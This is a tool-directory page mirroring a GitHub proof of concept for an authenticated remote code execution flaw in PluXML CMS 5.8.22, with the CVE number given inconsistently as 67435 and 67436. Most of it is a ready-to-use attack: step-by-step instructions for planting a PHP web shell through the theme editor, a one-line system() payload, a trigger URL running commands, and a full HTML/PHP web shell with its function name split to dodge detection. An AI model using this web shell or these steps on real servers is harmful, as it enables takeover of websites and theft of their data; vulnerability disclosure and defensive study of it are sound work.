Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-67435 — A critical Remote Code Execution (RCE) vulnerability has been identified in PluXML CMS version 5.8.22. This vulnerability allows authenticated administrators to execute arbitrary PHP code on the web server by uploading malicious PHP web shells through the theme editor functionality. | Kitploit
Tools/GitHubGitHub/rajchowdhury240/cve-2025-67435
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubrajchowdhury240/cve-2025-67435

CVE-2025-67435

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

A critical Remote Code Execution (RCE) vulnerability has been identified in PluXML CMS version 5.8.22. This vulnerability allows authenticated administrators to execute arbitrary PHP code on the web server by uploading malicious PHP web shells through the theme editor functionality.

17 months agoNot yet reviewed
Share

CVE-2025-67436

Authenticated Remote Code Execution (RCE) in PluXml CMS 5.8.22

Researcher : Chowdhury Faizal Ahammed

Installation

root@kitploit:~
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
image image image image image

Proof of Concept

Step-by-Step Exploitation

Authentication: Log in to the PluXML administrator panel with valid administrator credentials Navigate to Theme Editor:

Access the administration dashboard Navigate to: Themes → Home.php → Edit image

Inject Malicious Payload:

  • Replace the existing content in home.php with a PHP web shell

  • Example payload: <?php system($_GET['cmd']); ?>

  • Save the modified file

Trigger Execution:

Visit the main home page of the website The injected PHP code executes with web server privileges

  • Remote commands can be executed via: http://target.com/?cmd=whoami

Reverse Shell

image

Payload of webshell

root@kitploit:~
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input
        type="TEXT"
        name="cmd"
        autofocus
        id="cmd"
        size="80"
      >
      <input
        type="SUBMIT"
        value="Execute"
      >
    </form>

    <pre>
<?php
if (isset($_GET['cmd'])) {
    $func_name = "sys" . "tem";
    $func_name($_GET['cmd']);
}
?>
    </pre>
  </body>
</html>
image image

References

  • CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
  • PluXML Official Website: https://www.pluxml.org/
  • PluXML GitHub Repository: https://github.com/pluxml/PluXml
  • OWASP Top 10 - A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/
Download Tool